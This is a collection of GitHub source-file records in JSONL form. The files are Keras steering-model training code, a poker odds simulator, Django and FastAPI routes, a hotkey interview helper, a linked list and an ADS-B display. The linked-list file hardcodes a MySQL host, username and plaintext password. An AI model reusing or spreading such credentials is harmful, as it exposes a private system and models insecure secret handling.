load_driving_logs(logs, path):\n f = []\n y = []\n for d in logs:\n log = d+'driving_log.csv'\n with open(log,'r') as csvfile:\n reader = csv.reader(csvfile, delimiter=',')\n for row in reader:\n imgc_file = path + d + row[0].strip()\n imgl_file = path + d + row[1].strip()\n imgr_file = path + d + row[2].strip()\n if (os.path.isfile(imgc_file) & os.path.isfile(imgl_file) & os.path.isfile(imgr_file)):\n f.append(imgc_file)\n y.append(np.float32(row[3]))\n f.append(imgl_file)\n y.append(np.float32(row[3])+0.2)\n f.append(imgr_file)\n y.append(np.float32(row[3])-0.2)\n return f, y\n \ndef split_driving_log(f, y, train_percent, seed=1973):\n ft = []\n yt = []\n fv = []\n yv = []\n np.random.seed(seed)\n for idx, img in enumerate(f):\n if (np.random.random() <= train_percent):\n ft.append(img)\n yt.append(y[idx])\n else:\n fv.append(img)\n yv.append(y[idx])\n return ft, yt, fv, yv\n\ndef grouper(iterable, n, fillvalue=None):\n args = [iter(iterable)] * n\n return zip_longest(*args, fillvalue=fillvalue)\n\ndef load_image(f):\n img = cv2.imread(f,-1)\n img = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)\n return img \n \ndef extract_csv(log):\n f = []\n y = []\n with open(log,'r') as csvfile:\n reader = csv.reader(csvfile, delimiter=',')\n for row in reader:\n f.append(row[0].strip())\n y.append(np.float32(row[3]))\n f.append(row[1].strip())\n y.append(np.float32(row[3])+0.2)\n f.append(row[2].strip())\n y.append(np.float32(row[3])-0.2)\n return f, y\n\ndef gamma_correction(img, correction):\n img = img/255.0\n img = cv2.pow(img, correction)\n return np.uint8(img*255)\n\ndef preprocess_image(img):\n img = img[60:140,:,:]\n img = cv2.resize(img,(64, 64))\n return(img)\n \n \ndef bin_data(f, y, bins):\n fb = {}\n yb = {}\n for idx, img in enumerate(f):\n bin = str((i for i,v in enumerate(bins) if v >= y[idx]).__next__())\n if bin in fb:\n fb[bin].append(img)\n yb[bin].append(y[idx])\n else:\n fb[bin] = [img]\n yb[bin] = [y[idx]]\n return fb, yb\n \n \ndef generate_balanced(fb, yb, n):\n while True:\n xs = []\n ys = []\n for _ in range(n):\n bin = np.random.randint(low=1, high=8)\n l = len(fb[str(bin)])\n i = np.random.randint(low=0,high=l)\n img, angle = generate_image(load_image(fb[str(bin)][i]),yb[str(bin)][i])\n xs.append(img)\n ys.append(angle)\n yield (np.asarray(xs), np.asarray(ys))\n \n \ndef generate_image(img, y):\n \n angle = y\n\n X_OFFSET_RANGE = 10\n Y_OFFSET_RANGE = 10\n X_OFFSET_ANGLE = 0.2\n \n img = preprocess_image(img)\n \n bright_factor = 0.2 + (3.8 * np.random.uniform())\n img = gamma_correction(img, bright_factor)\n\n if (np.random.uniform() > 1.0):\n img = np.fliplr(img)\n angle = -1.0 * angle\n\n x_translation = (X_OFFSET_RANGE * np.random.uniform()) - (X_OFFSET_RANGE / 2)\n y_translation = (Y_OFFSET_RANGE * np.random.uniform()) - (Y_OFFSET_RANGE / 2)\n\n angle = angle + ((x_translation / X_OFFSET_RANGE) * 2) * X_OFFSET_ANGLE\n t = np.float32([[1, 0, x_translation], [0, 1, y_translation]])\n img = cv2.warpAffine(img, t, (img.shape[1], img.shape[0]))\n\n return (img, angle)\n\n \ndef generator_random_zero(n, img_dir, logfile):\n f, y = extract_csv(logfile)\n l = len(f)\n while True:\n xs = []\n ys = []\n for _ in range(n):\n i = np.random.randint(low=0,high=l)\n if ( (np.float32(y[i]) >= -0.01 \n and np.float32(y[i]) <= 0.01 ) \n and np.random.uniform() > 0.1 ):\n while (np.float32(y[i]) >= -0.01 \n and np.float32(y[i]) <= 0.01):\n i = np.random.randint(low=0,high=l)\n elif ( (np.float32(y[i]) >= -0.21 \n and np.float32(y[i]) <= -0.19 ) \n and np.random.uniform() > 0.1 ):\n while (np.float32(y[i]) >= -0.21 \n and np.float32(y[i]) <= -0.19):\n i = np.random.randint(low=0,high=l)\n elif ( (np.float32(y[i]) >= 0.19 \n and np.float32(y[i]) <= 0.21 ) \n and np.random.uniform() > 0.1 ):\n while (np.float32(y[i]) >= 0.19 \n and np.float32(y[i]) <= 0.21):\n i = np.random.randint(low=0,high=l)\n img, angle = generate_image(load_image(img_dir+f[i]),np.float32(y[i]))\n xs.append(img)\n ys.append(y[i])\n yield (np.asarray(xs), np.asarray(ys))\n\ndef generator_all_batch(n, img_dir, logfile):\n f, y = extract_csv(logfile)\n l = len(f)\n while True:\n xs = []\n ys = []\n for i in range(0,l,n):\n xs.append(preprocess_image(load_image(img_dir+f[i])))\n ys.append(np.float32(y[i]))\n yield (np.asarray(xs), np.asarray(ys))\n\n \ndef get_model():\n ch, row, col = 3, 64, 64 \n\n model = Sequential()\n model.add(Lambda(lambda x: x/127.5 - 1.,\n input_shape=( row, col, ch),\n output_shape=( row, col, ch)))\n model.add(Convolution2D(32, 3, 3, border_mode=\"same\"))\n model.add(MaxPooling2D(pool_size=(2,2)))\n model.add(Dropout(0.5))\n model.add(ELU())\n model.add(Convolution2D(64, 3, 3, border_mode=\"same\"))\n model.add(MaxPooling2D(pool_size=(2,2)))\n model.add(Dropout(0.5))\n model.add(ELU())\n model.add(Convolution2D(128, 3, 3, border_mode=\"same\"))\n model.add(MaxPooling2D(pool_size=(2,2)))\n model.add(Dropout(0.5)) \n model.add(ELU())\n model.add(Flatten())\n model.add(Dense(512))\n model.add(ELU())\n model.add(Dense(64))\n model.add(ELU())\n model.add(Dense(16))\n model.add(ELU())\n model.add(Dense(1))\n return model\n\n\n\nlogs = [ 'data/two-laps-middle-forward/', \n 'data/two-laps-middle-backwards/', \n 'data/two-laps-recovery-forward/']\n\nf, y = load_driving_logs(logs, '/home/mattwg/Projects/carnd-cloning-experiments/')\nfb, yb = bin_data(f, y, bins = (-999, -0.3, -0.2, -0.1, 0.1, 0.2, 0.3, 999 ))\n\nprint([ 'bin:{}={}'.format(k,len(fb[k])) for k in sorted(fb.keys())])\nprint(sum([len(fb[k]) for k in fb.keys()]))\n\n# Just to check distributions:\ng = generate_balanced(fb, yb, 10000)\nfg, yg = g.__next__()\nplt.hist(yg, bins = 20)\n\nparser = argparse.ArgumentParser(description='Train Model')\nparser.add_argument('--model', type=str, help='Optional path to model to continue training')\nargs = parser.parse_args()\n\nif args.model:\n print('Loading model for continued training!')\n with open(args.model, 'r') as f:\n json = f.read()\n model = model_from_json(json)\nelse:\n print('Training new model!')\n model = get_model()\n\nn_train = len(f)\nprint(n_train)\n\nn_epochs = 10\nbatch_size = 50\nn_batches = 10 \n\nmodel.compile(optimizer=Adam(lr=0.00001), loss=\"mse\")\n\nif args.model:\n model.load_weights('model.h5')\n \nmodel.fit_generator(\n generate_balanced(fb, yb, batch_size),\n samples_per_epoch=n_batches,\n nb_epoch=n_epochs, verbose=1)\n\njson = model.to_json()\nwith open('model.json', 'w') as f:\n f.write(json) \nmodel.save_weights('model.h5')\n\n\n\n","repo_name":"mattwg/carnd-cloning-experiments","sub_path":"model-balanced.py","file_name":"model-balanced.py","file_ext":"py","file_size_in_byte":8226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17037229301","text":"import random\nimport time\nnumber = int(input('请输入玩家人数:'))\n\n\nA=['♥','♠','♦','♣']\nB=['3','4','5','6','7','8','9','10','J','Q','K','A','2']\npoker=[]\n\nn=1\nfor i in A:\n for j in B:\n poker.append((n,(i+j)))\n n=n+1\n#print(\"开始洗牌....\")\n#print(poker)\npokers=poker.copy( )\n\n\n\n\n#定义洗牌\ndef xipai(x):\n for i in x:\n pokers.remove(i)\n return pokers\n\n#定义发牌\ndef fapai(y):\n for i in y:\n print(i[1],',',end=\" \")\n\n\n# 牌号值进行转换\ndef zhuanhuan(hand):\n global shuzi\n global huase\n shuzi = []\n huase = []\n for i in hand:\n shuzi.append((i[0]) % 13)\n huase.append((i[0]) // 13)\n # print(huase,shuzi)\n return shuzi, huase\n\n\n# 定义五项的组合\ndef combin(nums):\n from itertools import combinations\n result = []\n for i in combinations(nums, 5):\n result.append(list(i))\n return result\n\n\n# 判断是否对子\ndef kind(n, pai):\n dui = []\n zhuanhuan(pai)\n for i in shuzi:\n shu = shuzi.count(i)\n if shu == n:\n if i in dui:\n continue\n dui.append(i)\n return dui\n\n\n# 判断牌型级别\ndef shunzi(pai):\n global jibie\n jibie = 0\n zhuanhuan(pai)\n # 判断是否是高牌\n '''\n if max(shuzi) == 13 and len(set(shuzi)) == 5:\n jibie =jibie + 10**1\n '''\n\n # 判断是否皇家同花顺\n if max(shuzi) - min(shuzi) == 4 and len(set(shuzi)) == 5 and len(set(huase)) == 1 and max(shuzi) == 12:\n jibie = 900\n return jibie\n\n # 判断是否同花顺\n elif max(shuzi) - min(shuzi) == 4 and len(set(shuzi)) == 5 and len(set(huase)) == 1 and max(shuzi) != 13:\n jibie = 800\n return jibie\n\n # 判断是否四条\n elif len(kind(4, pai)) == 1:\n jibie = 700\n return jibie\n\n # 判断是否葫芦\n elif len(kind(3, pai)) == 1 and len(kind(2, pai)) == 1:\n jibie = 600\n return jibie\n\n # 判断是否同花\n elif len(set(huase)) == 1:\n jibie = 500\n return jibie\n\n # 判断是否顺子\n elif max(shuzi) - min(shuzi) == 4 and len(set(shuzi)) == 5 and max(shuzi) != 13:\n jibie = 400\n return jibie\n\n # 判断是否三条\n elif len(kind(3, pai)) == 1:\n jibie = 300\n return jibie\n\n # 判断是否两对\n elif len(kind(2, pai)) == 2:\n jibie = 200\n return jibie\n\n # 判断是否对子\n elif len(kind(2, pai)) == 1:\n jibie = 100\n return jibie\n else:\n return jibie\n # print(jibie)\n\n\n# 判断最终牌型\ndef panduan(pai):\n type = ''\n danji = []\n for i in combin(pai):\n t = shunzi(i)\n # print(i,t)\n danji.append(t)\n jibie = max(danji)\n # print(jibie)\n if 100 <= jibie < 200:\n type = '对子'\n elif 200 <= jibie < 300:\n type = '两对'\n elif 300 <= jibie < 400:\n type = '��条'\n elif 400 <= jibie < 500:\n type = '顺子'\n elif 500 <= jibie < 600:\n type = '同花'\n elif 600 <= jibie < 700:\n type = '葫芦'\n elif 700<= jibie < 800:\n type = '四条'\n elif 800 <= jibie < 900:\n type = '同花顺'\n elif 900 <= jibie < 1000:\n type = '皇家同花顺'\n else:\n type = '普通'\n return type\n\n#定义函数:每个人发5张牌\ndef fadipai(number):\n #time.sleep(3)\n global pokers\n pokers = poker.copy( )\n global pokername\n random.shuffle(pokers)\n #print(pokers)\n #print(pokers)\n pokername = []\n for i in range(number):\n pokername.append(random.sample(pokers,5))\n pokers = xipai(pokername[i])\n #print(\"\\n开始给player{}发牌:\".format(i+1))\n #fapai(pokername[i])\n pokername[i].sort()\n\ndict = {}\n#定义函数:玩家轮流查看底牌\ndef chakanpai(number):\n fadipai(number) # 发底牌\n #print('\\n')\n for i in range(number):\n print(\"player{}的牌:\".format(i+1))\n fapai(pokername[i])\n paixing = panduan(pokername[i])\n print(paixing)\n #if paixing not in dict:\n if paixing in dict:\n dict[paixing] = dict[paixing] + 1\n else:\n dict[paixing] = 1\n #print(dict)\n return dict\nnum = int(input('输入执行次数:'))\nfor i in range(num+1):\n print('\\n第{}轮:'.format(i))\n chakanpai(number)#玩家查看牌\nprint(dict)\ngailv = {}\nfor i in dict:\n gailv[i] = str(dict[i] / (num * number) * 100) + '%'\nprint(gailv)\n","repo_name":"FrancisLi196/SUSTech-Game-2020","sub_path":"Group6\\tongji.py","file_name":"Group6\\tongji.py","file_ext":"py","file_size_in_byte":4478,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"44061725150","text":"from django.urls import path\nfrom . import views\nfrom rest_framework.urlpatterns import format_suffix_patterns\n\nurlpatterns = [\n path('', views.IndexPage.as_view(), name=\"load_index_page\"),\n path('load_login_page', views.LoginPage.as_view(), name=\"load_login_page\"),\n path('load_register_page', views.RegisterPage.as_view(), name=\"load_register_page\"),\n\n path('register', views.UserList.as_view(), name=\"register\"),\n path('getUserList', views.UserList.as_view(), name=\"getUserList\"),\n\n path('login', views.LoginLogoutList.as_view(), name=\"login\"),\n path('logout', views.LoginLogoutList.as_view(), name=\"logout\"),\n]\nurlpatterns = format_suffix_patterns(urlpatterns)\n","repo_name":"nareshkumarinbox/pyTweet","sub_path":"accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43911873317","text":"from datetime import date\r\nfrom typing import Optional\r\n\r\nfrom fastapi import FastAPI\r\nfrom fastapi.encoders import jsonable_encoder\r\nfrom fastapi.responses import JSONResponse\r\nfrom sqlalchemy import create_engine\r\nfrom sqlalchemy.orm import sessionmaker\r\n\r\nfrom app.models import Base, Book\r\nfrom app.settings import DATABASE_URL\r\n\r\n# DISCLAIMER:\r\n# This is a very simple CRUD API\r\n# Not intended for production\r\n\r\n\r\nengine = create_engine(DATABASE_URL)\r\nSession = sessionmaker(bind=engine)\r\n\r\n\r\ndef recreate_database():\r\n # Base.metadata.drop_all(engine)\r\n Base.metadata.create_all(engine)\r\n\r\n\r\nrecreate_database()\r\n\r\napp = FastAPI()\r\n\r\n\r\n@app.get(\"/\")\r\ndef root():\r\n return {\"message\": \"Sample books API is online\"}\r\n\r\n\r\n@app.post(\"/books\")\r\ndef create_book(title: str, pages: int):\r\n session = Session()\r\n book = Book(title=title, pages=pages, created_at=date.today())\r\n session.add(book)\r\n session.commit()\r\n session.close()\r\n\r\n return JSONResponse(\r\n status_code=200, content={\"status_code\": 200, \"message\": \"success\"}\r\n )\r\n\r\n\r\n@app.get(\"/books/{id}\")\r\ndef find_book(id: int):\r\n session = Session()\r\n book = session.query(Book).filter(Book.id == id).first()\r\n session.close()\r\n\r\n result = jsonable_encoder({\"book\": book})\r\n\r\n return JSONResponse(status_code=200, content={\"status_code\": 200, \"result\": result})\r\n\r\n\r\n@app.get(\"/books\")\r\ndef get_books(page_size: int = 10, page: int = 1):\r\n if page_size > 100 or page_size < 0:\r\n page_size = 100\r\n\r\n session = Session()\r\n books = session.query(Book).limit(page_size).offset((page - 1) * page_size).all()\r\n session.close()\r\n\r\n result = jsonable_encoder({\"books\": books})\r\n\r\n return JSONResponse(status_code=200, content={\"status_code\": 200, \"result\": result})\r\n\r\n\r\n@app.put(\"/books\")\r\ndef update_book(id: int, title: Optional[str] = None, pages: Optional[int] = None):\r\n session = Session()\r\n book = session.query(Book).get(id)\r\n if title is not None:\r\n book.title = title\r\n if pages is not None:\r\n book.pages = pages\r\n session.commit()\r\n session.close()\r\n\r\n return JSONResponse(\r\n status_code=200, content={\"status_code\": 200, \"message\": \"success\"}\r\n )\r\n\r\n\r\n@app.delete(\"/books\")\r\ndef delete_book(id: int):\r\n session = Session()\r\n book = session.query(Book).get(id)\r\n session.delete(book)\r\n session.commit()\r\n session.close()\r\n\r\n return JSONResponse(\r\n status_code=200, content={\"status_code\": 200, \"message\": \"success\"}\r\n )\r\n\r\n\r\n@app.exception_handler(Exception)\r\ndef exception_handler(request, exc):\r\n json_resp = get_default_error_response()\r\n return json_resp\r\n\r\n\r\ndef get_default_error_response(status_code=500, message=\"Internal Server Error\"):\r\n return JSONResponse(\r\n status_code=status_code,\r\n content={\"status_code\": status_code, \"message\": message},\r\n )\r\n","repo_name":"jeremyleonardo/books-crud-fastapi","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2897,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"12321589321","text":"# You are given a number that contains 4 digits with at least two distinct digits. \n# Your program should perform the following routine on the number: Arrange the digits in descending order and in ascending order\n# (adding zeros to fit it to a 4-digit number), and subtract the smaller number from the bigger number.\n# Then repeat the previous step. Performing this routine will always cause you to reach a fixed number: 6174.\n# Your program should return the number of times this routine must be performed until 6174 is reached.\n\nnum = input(\"Input\\n\");\nasc = ''.join(sorted(num));\ndes = ''.join(sorted(num, reverse = True));\ndiff = str(abs(int(des) - int(asc))).zfill(4);\ncount = 1;\nwhile(int(diff) != 6174 and int(diff) > 0):\n asc = ''.join(sorted(diff));\n des = ''.join(sorted(diff, reverse = True));\n diff = str(abs(int(des) - int(asc))).zfill(4);\n count += 1;\nprint(\"Output:\");\nprint(count);\n\n\n'''EX1:\nInput: \n2111 \nOutput: \n5 \n\n''EX2: \nInput: \n9831 \nOutput: \n7\n\n\nFor example, if num is 3524 your program should return 3 because of the following steps:\n\n(1) 5432 - 2345 = 3087 \n(2) 8730 - 0378 = 8352 \n(3) 8532 - 2358 = 6174\n'''\n","repo_name":"MaxSoEn/IEEE-ZSB-Technical-Rookies-22","sub_path":"Task-3/problem-6.py","file_name":"problem-6.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3705419836","text":"import os\nimport sys\nimport errno\nimport random\nimport glob\nimport tkinter\nfrom tkinter import filedialog\nimport pyautogui\nimport time\nimport configparser\n\nroot = tkinter.Tk()\nroot.withdraw()\n\n#Setting current Dir\ndir_path = os.path.dirname(os.path.realpath(__file__))\n\n\n#Move mouse to upper left screen to kill in case of error\npyautogui.FAILSAFE = True\n\nautokeytemplate = (\"\"\"import subprocess\nimport os\nos.chdir(\"{0}\")\nsubprocess.call(\"python randinterq.py {1}\", shell=True)\n\"\"\")\n\nautokeyjsontemplate = (\"\"\"{{\n \"type\": \"script\",\n \"description\": \"{0}\",\n \"store\": {{}},\n \"modes\": [\n 1\n ],\n \"usageCount\": 0,\n \"prompt\": false,\n \"omitTrigger\": false,\n \"showInTrayMenu\": false,\n \"abbreviation\": {{\n \"abbreviations\": [\n \"{1}\"\n ],\n \"backspace\": true,\n \"ignoreCase\": false,\n \"immediate\": false,\n \"triggerInside\": false,\n \"wordChars\": \"[^\\\\t]\"\n }},\n \"hotkey\": {{\n \"modifiers\": [],\n \"hotKey\": null\n }},\n \"filter\": {{\n \"regex\": null,\n \"isRecursive\": false\n }}\n}}\"\"\")\n\nahktemplate = (\"\"\"\n::{0}::\nSetWorkingDir, {1}\nRun %comspec% /c \"\"{2}\" \"{3}\"\",,hide\nreturn\n\"\"\")\n\nconfig = configparser.ConfigParser()\nahkpath = 'none'\nautokeypath = 'None'\nqpath = dir_path\n\n\nif os.path.isfile('config.ini'):\n config.sections()\n config.read('config.ini')\n ahkpath = config['Default']['ahkdir']\n autokeypath = config['Default']['autokeydir']\n qpath = config['Default']['qdir']\n\n\ndef createdir():\n numdir = int(input(\"Please enter the number of questions (directories) you would like: \"))\n a = 0\n while a <= numdir:\n dir_name = (\"Question %s\" % a)\n try:\n os.mkdir(dir_name)\n except OSError as exception:\n if exception.errno != errno.EEXIST:\n raise\n a = a + 1\n passfail = input(\"Would you like to create the pass/fail directories? (y/n): \")\n if passfail == 'y':\n try:\n os.mkdir(\"Question pass\")\n os.mkdir(\"Question fail\")\n except OSError as exception:\n if exception.errno != errno.EEXIST:\n raise\n\n\ndef writerandomq():\n script, qnum = sys.argv\n os.chdir(qpath)\n #Create list of filenames\n search_path = os.path.join('Question %s' % qnum, '*.txt')\n filenames = glob.glob(search_path)\n\n #Open Random file from list\n selqfile = open(random.choice(filenames))\n qcontent = selqfile.read()\n\n #Write content of file\n pyautogui.typewrite(qcontent)\n\ndef genautokey():\n gen = input(\"\\nDo you wish to generate the python autokey files? (y/n): \")\n numq = None\n if gen == 'y':\n print(\"\\nI recommend using question 0 as the intro of your interview script.\"\n \"\\nIt will be created along with the other questions.\")\n numq = int(input(\"\\nPlease enter the number of questions you have: \"))\n a = 0\n os.chdir(autokeypath)\n while a <= numq:\n f = open(\"question%s.py\" % a, \"w\")\n f.write(autokeytemplate.format(dir_path, a))\n a = a + 1\n f.close()\n f = open(\"pass.py\", \"w\")\n f.write(autokeytemplate.format(dir_path, 'pass'))\n f.close()\n f = open(\"fail.py\", \"w\")\n f.write(autokeytemplate.format(dir_path, 'fail'))\n f.close()\n gjson = input(\"Do you wish to generate the .json files as well? (y/n): \")\n if gjson == 'y':\n if numq == None:\n numq = int(input(\"\\nPlease enter the number of questions you have: \"))\n b = 0\n os.chdir(autokeypath)\n while b <= numq:\n f = open(\".question%s.json\" % b, \"w\")\n f.write(autokeyjsontemplate.format('Question %s' % b, 'q%s'% b))\n f.close()\n b = b + 1\n f = open(\".pass.json\", \"w\")\n f.write(autokeyjsontemplate.format('pass', 'pass'))\n f.close()\n f = open(\".fail.json\", \"w\")\n f.write(autokeyjsontemplate.format('fail', 'fail'))\n f.close()\n leaving()\n else:\n leaving()\n\ndef genahk():\n numq = None\n print(\"\\nI recommend using question 0 as the intro of your interview script.\"\n \"It will be created along with the other questions.\")\n numq = int(input(\"\\nPlease enter the number of questions you have: \"))\n a = 0\n os.chdir(ahkpath)\n filename = os.path.splitext(os.path.basename(__file__))[0]\n with open(\"randinterq.ahk\", \"w\") as file:\n file.write('#Hotstring EndChars `t')\n while a <= numq:\n file.write(ahktemplate.format('q%s' % a, dir_path, '%s.exe' % filename, a))\n a = a + 1\n file.write(ahktemplate.format('pass', dir_path, '%s.exe' % filename, 'pass'))\n file.write(ahktemplate.format('fail', dir_path, '%s.exe' % filename, 'fail'))\n leaving()\n\ndef leaving():\n os.chdir(dir_path)\n config['Default'] = {}\n config['Default']['ahkdir'] = ahkpath\n config['Default']['autokeydir'] = autokeypath\n config['Default']['qdir'] = qpath\n with open('config.ini', 'w') as configfile:\n config.write(configfile)\n print(\"\\nFor normal use of this program, please pass the number of the question you would like to write\")\n print(\"For example: 'randinterq 11' will return a random selection from question 11\")\n print(\"Will exit in 5 seconds\")\n time.sleep(5)\n exit()\n\nif len(sys.argv) == 1:\n print(\"\\nWelcome to the Apollo.rip Interviewer Companion app!\")\n choosedir = input(\"\\nWould you like to change the location of the question folders? (y/n): \")\n if choosedir == 'y':\n qpath = filedialog.askdirectory(initialdir='.')\n makedir = input(\"Do you wish to make some directories to hold your question files? (y/n): \")\n if makedir == 'y':\n os.chdir(qpath)\n createdir()\n windows = input(\"Are you running windows and using autohotkey? (y/n): \")\n if windows == 'y':\n ahkchangedir = input(\"Do you wish to set/change where the ahk script is saved? (y/n): \")\n if ahkchangedir == 'y':\n ahkpath = filedialog.askdirectory(initialdir='.')\n startgenahk = input(\"Do you wish to create the ahk script? (y/n): \")\n if startgenahk == 'y':\n genahk()\n linux = input(\"Are you running linux and using AutoKey? (y/n): \")\n if linux == 'y':\n autochangedir = input(\"Do you wish to set/change the AutoKey directory? (y/n): \")\n if autochangedir == 'y':\n linuxrdy = input(\"\\nPress y when you are ready to set the AutoKey directory \\n \\n\"\n \"Make sure this folder was already created by AutoKey previously \\n\"\n \"otherwise press any other key to exit: \")\n if linuxrdy == 'y':\n autokeypath = filedialog.askdirectory(initialdir='.')\n genautokey()\n else:\n leaving()\n else:\n genautokey()\n# if linux == 'n':\n# leaving()\n else:\n leaving()\nelse:\n writerandomq()\n","repo_name":"toptotem/randinterq","sub_path":"randinterq.py","file_name":"randinterq.py","file_ext":"py","file_size_in_byte":7003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74753859367","text":"\nRESULTS = {\n \"opt_param_file\": \"results_opt_param.csv\",\n \"opt_stats_file\": \"results_opt_stats.csv\",\n}\n\nPCD_DATA = {\n \"garage\": {\n \"name\": \"Garage\",\n \"spiral\": 'garage.pcd_spiral.dictionary',\n \"bastar\": 'garage.pcd_bastar.dictionary',\n \"sampled\": 'garage.pcd_sampled.dictionary',\n #\"new\": 'garage.pcd_new.dictionary'\n },\n \"bridge\": {\n \"name\": \"Bridge\",\n \"spiral\": 'bridge.pcd_spiral.dictionary',\n \"bastar\": 'bridge.pcd_bastar.dictionary',\n \"sampled\": 'bridge.pcd_sampled.dictionary',\n #\"new\": 'bridge.pcd_new.dictionary'\n },\n \"crossing\": {\n \"name\": \"Crossing\",\n \"spiral\": 'crossing.pcd_spiral.dictionary',\n \"bastar\": 'crossing.pcd_bastar.dictionary',\n \"sampled\": 'crossing.pcd_sampled.dictionary',\n #\"new\": 'crossing.pcd_new.dictionary'\n }\n}\n\nALGORITHM_DATA = {\n \"bastar\": {\n \"name\": \"BA*\",\n 'line': 'r',\n 'confidence_color': (1.0, 0.0, 0.0, 0.3)\n },\n \"spiral\": {\n \"name\": \"Inward Spiral\",\n 'line': 'b',\n 'confidence_color': (0.0, 0.0, 1.0, 0.3)\n },\n \"sampled\": {\n \"name\": \"Sampled BA* & Inward Spiral\",\n 'line': 'g',\n 'confidence_color': (0.0, 1.0, 0.0, 0.3)\n },\n #\"new\": {\n # \"name\": \"Random points\",\n # 'line': 'm',\n # 'confidence_color': (1.0, 0.0, 1.0, 0.3)\n #}\n}","repo_name":"danneengelson/urbanroadsweeper","sub_path":"src/urbanroadsweeper/results_config.py","file_name":"results_config.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"34613221199","text":"# 单向链表\n\nclass Node(object):\n\n def __init__(self, item):\n self.item = item\n self.next = None\n\n\nclass SingleLinkList(object):\n\n def __init__(self):\n self._head = None\n # self._head.next = None # 初始化一个空节点 ()\n\n def is_empty(self):\n # 判断当前单链表是否为空, 只需判断是否存在头节点\n if self._head == None:\n return True\n return False\n\n def length(self):\n cur = self._head\n if not cur:\n return 0\n else:\n n = 1\n while cur.next != None:\n cur = cur.next\n n += 1\n return n\n\n def ergodic(self):\n if self.is_empty():\n return\n cur = self._head\n while cur.next != None:\n print(cur.item, end=' ergo ')\n cur = cur.next\n print(cur.item)\n\n\n\n def add(self, item):\n \"\"\"\n 头部增加节点\n :param item: 节点值\n :return:\n \"\"\"\n\n node = Node(item) # 创建节点对象\n node.next = self._head # 新增节点指向self._head指向的节点\n self._head = node # self._head 指向新增node节点\n\n def append(self, item):\n \"\"\"\n 尾部增加节点\n :param item: 节点值\n :return:\n \"\"\"\n cur = self._head\n if not cur:\n self.add(item)\n else:\n node = Node(item)\n while cur.next != None:\n cur = cur.next\n cur.next = node\n\n\n\n def insert(self, index, item):\n '''插入元素'''\n if index == 0:\n self.add(item)\n elif index >= self.length:\n self.append(item)\n else:\n cur = self._head\n n = 1\n node = Node(item)\n pre = None\n while cur.next != None:\n if n != index:\n pre = cur\n cur = cur.next\n n += 1\n else:\n pre.next = node\n node.next = cur\n break\n\n\n def remove(self, item):\n '''移除元素'''\n if self.is_empty():\n raise ValueError('null node')\n cur = self._head\n if cur.item == item:\n self._head = cur.next\n while cur.next:\n pre = cur\n cur = cur.next\n if cur.item == item:\n pre.next = cur.next\n\n def search(self, item):\n \"\"\"查找元素\"\"\"\n cur = self._head\n while None != cur:\n if cur.item == item:\n return True\n cur = cur.next\n return False\n\n\nMDC_DB_DICT = {\n \"host\": \"192.168.1.243\",\n \"port\": 3306,\n \"user\": \"readonly\",\n \"password\": \"3XhZ9pYduyKn\",\n \"database\": \"mdc\",\n \"charset\": \"utf8\",\n}\n\n{\n 'db': 'mdc',\n 'USER': 'readonly',\n 'PASSWORD': '3XhZ9pYduyKn',\n 'HOST': '192.168.1.243',\n 'PORT': 3306,\n}\n\n\nif __name__ == '__main__':\n single = SingleLinkList()\n single.add(11)\n single.add(22)\n print(single.is_empty())\n single.ergodic()\n single.remove(2)\n single.remove(1)\n single.ergodic()\n print(single.search(22))\n\n\n\n","repo_name":"281234086/data_struct","sub_path":"struct/linklist/single_link.py","file_name":"single_link.py","file_ext":"py","file_size_in_byte":3236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41683867364","text":"import pygame\nimport sys\nimport time\nimport threading\nfrom serial import Serial\nimport subprocess\nimport json\nimport urllib.request\nimport math\n\n# Dump1090 starten\np = subprocess.Popen(['sudo', './dump1090', '--quiet', '--net'], cwd=\"/home/adsbpi/dump1090\")\nurl = \"http://localhost:8080/data/aircraft.json\"\n\n# Pygame initialisiern\npygame.init()\n\n# FÜR PR0GRAMMIEREN IMMER FALSE\nVollbild = True\n\n# Variablen\ngps_thread_running = True\t# Läuft der GPS-Thread\ngps_signal = False\t\t# GPS-Signalempfang\nplanedetec_raw = 0\t\t# Anzahl an detektierter Flugzeuge\nplanedetec_loc = 0\t\t# Anzahl an detek. Flug. mit Koordinaten\nlat = 48.8\t\t\t# Eigene Position Breitengrad\nlon = 9.2\t\t\t# Eigene Position Längengrad\nsats = 0\t\t\t# Anzahl GPS-Satelliten in Verwendung\nalt = 100\t\t\t# GPS-Antennenhöhe über NN in m\nspeed = 0\t\t\t# GPS-Geschwindigkeit in kt\ncourse = 0\t\t\t# Eigener Kurs / Winkel zum Nordpol\nmaprotation = 0\t\t\t# Verdrehung der Karte\ndeadtime1 = 10\t\t\t# Zeit seit dem letzten Signal, ab wann markiert wird\ndeadtime2 = 30\t\t\t# ... , ab wann nicht mehr anzeigen (Dump1090 intern ab 300s)\nscale = 0.1\t\t\t# Maßstab (km pro Pixel)\nscale_alt = 100.0\t\t# Zur Detektion, ob Kompass neu berechnet werden muss\n\nRadio = True\t\t\t# Ob Funkrufname angezeigt werden soll, sonst ICAO-Code\nInfo = True\t\t\t# Ob Weitere Informationen (Höhe, Course, Speed) angezeigt werden\nHide = False\t\t\t# Ob ab großer Höhendifferenz nur vermindert dargestellt wird\ndeltaH = 2000\t\t\t# Höhendifferenzschwelle in ft für Hide\n\n# Bildschirmmaße definieren\nscreen_width = 800\nif Vollbild:\n\tscreen_height = 480\nelse:\n\tscreen_height = 420\nscreen = (screen_width, screen_height)\nMenuebreite = 100\nMenuekante = int(screen_width - Menuebreite)\nRandbreite = 10\n\n# Eigene Positon im 